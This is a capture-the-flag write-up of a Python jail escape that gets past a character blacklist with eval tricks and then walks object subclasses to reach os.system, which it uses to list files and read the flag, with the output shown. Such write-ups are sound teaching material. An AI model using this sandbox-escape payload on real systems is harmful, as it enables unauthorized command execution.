Tags: sandbox pyjail 

Rating: 5.0

Because of the previous [challenge](https://ctftime.org/writeup/23297) we know

we can use `input` to execute pretty much anything and bypass the blacklisted chars

Let's print all subclasses()

```
>>> a = print(eval(eval("inp"+eval.__doc__[3+1]+"t()")))
"".__class__.__mro__[1].__subclasses__()
[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>, <class 'instancemethod'>, <class 'classmethod_descriptor'>, <class 'method_descriptor'>, <class 'callable_iterator'>, <class 'iterator'>, <class 'coroutine'>, <class 'coroutine_wrapper'>, <class 'EncodingMap'>, <class 'fieldnameiterator'>, <class 'formatteriterator'>, <class 'filter'>, <class 'map'>, <class 'zip'>, <class 'moduledef'>, <class 'module'>, <class 'BaseException'>, <class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib._installed_safely'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib.BuiltinImporter'>, <class 'classmethod'>, <class '_frozen_importlib.FrozenImporter'>, <class '_frozen_importlib._ImportLockContext'>, <class '_thread._localdummy'>, <class '_thread._local'>, <class '_thread.lock'>, <class '_thread.RLock'>, <class '_frozen_importlib_external.WindowsRegistryFinder'>, <class '_frozen_importlib_external._LoaderBasics'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.PathFinder'>, <class '_frozen_importlib_external.FileFinder'>, <class '_io._IOBase'>, <class '_io._BytesIOBuffer'>, <class '_io.IncrementalNewlineDecoder'>, <class 'posix.ScandirIterator'>, <class 'posix.DirEntry'>, <class 'zipimport.zipimporter'>, <class 'codecs.Codec'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class 'abc.ABC'>, <class 'collections.abc.Hashable'>, <class 'collections.abc.Awaitable'>, <class 'collections.abc.AsyncIterable'>, <class 'async_generator'>, <class 'collections.abc.Iterable'>, <class 'bytes_iterator'>, <class 'bytearray_iterator'>, <class 'dict_keyiterator'>, <class 'dict_valueiterator'>, <class 'dict_itemiterator'>, <class 'list_iterator'>, <class 'list_reverseiterator'>, <class 'range_iterator'>, <class 'set_iterator'>, <class 'str_iterator'>, <class 'tuple_iterator'>, <class 'collections.abc.Sized'>, <class 'collections.abc.Container'>, <class 'collections.abc.Callable'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class '_sitebuiltins._Helper'>]
```

We need `os._wrap_close` to execute `system` function

```
>>> a = print(eval(eval("inp"+eval.__doc__[3+1]+"t()")))
"".__class__.__mro__[1].__subclasses__()[117].__init__.__globals__["system"]("ls -la")
total 40
drwxr-xr-x. 2 root root 131 Sep 3 18:27 .
drwxr-xr-x. 3 root root 17 Jul 22 18:42 ..
-rw-r--r--. 1 root root 220 Apr 4 2018 .bash_logout
-rw-r--r--. 1 root root 3771 Apr 4 2018 .bashrc
-rw-r--r--. 1 root root 807 Apr 4 2018 .profile
-rw-r--r--. 1 root root 29 Aug 29 15:20 LOS7Z9XYZU8YS89Q24PPHMMQFQ3Y7RIE.txt
-rwxr-xr-x. 1 root root 1328 Sep 3 18:27 pyjail.py
-rwxr-xr-x. 1 root root 18744 Jul 22 18:50 ynetd
```

Let's read `LOS7Z9XYZU8YS89Q24PPHMMQFQ3Y7RIE.txt`:

```
>>> a = print(eval(eval("inp"+eval.__doc__[3+1]+"t()")))
"".__class__.__mro__[1].__subclasses__()[117].__init__.__globals__["system"]("cat LOS7Z9XYZU8YS89Q24PPHMMQFQ3Y7RIE.txt")
ALLES{th1s_w4s_a_r34l_3sc4pe}
```

Flag: `ALLES{th1s_w4s_a_r34l_3sc4pe}`

As simple as that x)